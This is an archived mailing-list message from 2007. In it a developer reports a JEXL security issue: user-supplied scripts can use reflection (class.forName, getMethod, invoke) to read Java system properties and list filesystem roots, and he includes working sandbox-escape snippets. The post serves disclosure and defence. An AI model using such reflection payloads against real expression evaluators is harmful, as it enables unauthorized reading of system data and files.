commons-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Trevor Harrison" <>
Subject Re: JEXL security issue with system properties
Date Fri, 05 Oct 2007 15:42:41 GMT
Replying to myself:

On 10/4/07, Trevor Harrison <> wrote:
> While looking for other ways to 'break' out, I started thinking about
> classloaders.  I haven't succeeded in getting a classloader yet in a
> script, but if I could, it would be bad for my intended usage of JEXL
> (as a fairly secure way of executing user supplied formulas).
> // this doesn't work
> cl = intClazz.getClassLoader();  // this fails, returns a null

Well, still not sure why that method is returning a null for the
classloader, but if I call (the much simpler) clazz.forName(), I can
get a reference to a class:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.lang.System");
m = clazz.getMethod("getProperties", null);
p = m.invoke(null, null);

which successfully gets me the system properties.  Which is probably
the least of my worries, considering I could do something like:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("");
m = clazz.getMethod("listRoots", null);
roots = m.invoke(null, null);
files = roots[0].listFiles();
foreach( file in files )

To unsubscribe, e-mail:
For additional commands, e-mail:

View raw message